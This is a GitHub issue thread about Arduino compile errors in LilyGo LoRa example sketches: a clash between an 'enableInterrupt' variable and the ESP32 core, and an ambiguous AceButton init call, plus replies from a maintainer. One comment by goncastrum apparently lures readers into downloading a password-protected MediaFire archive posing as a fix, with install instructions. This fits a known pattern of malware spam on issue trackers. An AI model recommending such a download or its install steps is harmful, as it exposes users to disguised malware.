Xinyuan-LilyGO/LilyGo-LoRa-Series #197: TTGO Lora32-OLED SX1276_Receive_Interrupt.ino compile error

KenSamson, 2024-09-01:
It looks like the examples and the ESP32 libraries no longer match for interrupt definitions:

(Do the examples need to be updated or do I need to somehow change my setup?

This also happens to me for the T3S3 Factory example...  I have multiple boards...

C:\Users\ka0pi\Dev\LillyGo\Archive\LilyGo-LoRa-Series-0.0.1\examples\RadioLibExamples\SX1276\SX1276_Receive_Interrupt\SX1276_Receive_Interrupt.ino:33:15: error: 'volatile bool enableInterrupt' redeclared as different kind of entity
   33 | volatile bool enableInterrupt = true;
      |               ^~~~~~~~~~~~~~~
In file included from C:\Users\ka0pi\AppData\Local\Arduino15\packages\esp32\hardware\esp32\3.1.0-RC1\cores\esp32/esp32-hal.h:75,
                 from C:\Users\ka0pi\AppData\Local\Arduino15\packages\esp32\hardware\esp32\3.1.0-RC1\cores\esp32/Arduino.h:36,
                 from C:\Users\ka0pi\AppData\Local\Temp\arduino\sketches\305E07736F1FABB5A3679BC7DE6BA2E2\sketch\SX1276_Receive_Interrupt.ino.cpp:1:
C:\Users\ka0pi\AppData\Local\Arduino15\packages\esp32\hardware\esp32\3.1.0-RC1\cores\esp32/esp32-hal-gpio.h:81:6: note: previous declaration 'void enableInterrupt(uint8_t)'
   81 | void enableInterrupt(uint8_t pin);
      |      ^~~~~~~~~~~~~~~
C:\Users\ka0pi\Dev\LillyGo\Archive\LilyGo-LoRa-Series-0.0.1\examples\RadioLibExamples\SX1276\SX1276_Receive_Interrupt\SX1276_Receive_Interrupt.ino: In function 'void loop()':
C:\Users\ka0pi\Dev\LillyGo\Archive\LilyGo-LoRa-Series-0.0.1\examples\RadioLibExamples\SX1276\SX1276_Receive_Interrupt\SX1276_Receive_Interrupt.ino:128:25: error: assignment of function 'void enableInterrupt(uint8_t)'
  128 |         enableInterrupt = false;
      |         ~~~~~~~~~~~~~~~~^~~~~~~
C:\Users\ka0pi\Dev\LillyGo\Archive\LilyGo-LoRa-Series-0.0.1\examples\RadioLibExamples\SX1276\SX1276_Receive_Interrupt\SX1276_Receive_Interrupt.ino:214:25: error: assignment of function 'void enableInterrupt(uint8_t)'
  214 |         enableInterrupt = true;
      |         ~~~~~~~~~~~~~~~~^~~~~~

exit status 1

Compilation error: 'volatile bool enableInterrupt' redeclared as different kind of entity

goncastrum, 2024-09-02:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

lewisxhe, 2024-09-02:
Your example path does not match the main branch. Do you want to use the old example?

KenSamson, 2024-09-02:
The version of the board that I have is 1.1, which is older than the newest at 1.2.

I have tried this with the newest version, and got the same thing.    

I did add the header file as a text file... at the end, in case you want to compare it with one you have if we think it is the library that has a problem...

Thank you very much for your time....

C:\Users\ka0pi\Dev\LillyGo\LilyGo-LoRa-Series-master\examples\T3S3Factory\T3S3Factory.ino: In function 'void setup()':
C:\Users\ka0pi\Dev\LillyGo\LilyGo-LoRa-Series-master\examples\T3S3Factory\T3S3Factory.ino:231:16: error: call of overloaded 'init(int)' is ambiguous
  231 |     button.init(BUTTON_PIN);
      |     ~~~~~~~~~~~^~~~~~~~~~~~
In file included from c:\Users\ka0pi\Documents\Arduino\libraries\AceButton\src/AceButton.h:45,
                 from C:\Users\ka0pi\Dev\LillyGo\LilyGo-LoRa-Series-master\examples\T3S3Factory\T3S3Factory.ino:19:
c:\Users\ka0pi\Documents\Arduino\libraries\AceButton\src/ace_button/AceButton.h:203:10: note: candidate: 'void ace_button::AceButton::init(uint8_t, uint8_t, uint8_t)'
  203 |     void init(
      |          ^~~~
c:\Users\ka0pi\Documents\Arduino\libraries\AceButton\src/ace_button/AceButton.h:214:10: note: candidate: 'void ace_button::AceButton::init(ace_button::ButtonConfig*, uint8_t, uint8_t, uint8_t)'
  214 |     void init(
      |          ^~~~

exit status 1

Compilation error: call of overloaded 'init(int)' is ambiguous
[AceButton.h.txt](https://github.com/user-attachments/files/16832261/AceButton.h.txt)

lewisxhe, 2024-09-02:
V1.1? Do you mean T3S3 V1.1?
The only difference between T3S3 V1.1 and V1.2 is that there are two Qwiic connectors, nothing else has changed

lewisxhe, 2024-09-02:
[image]

closed 2024-10-17 by github-actions[bot]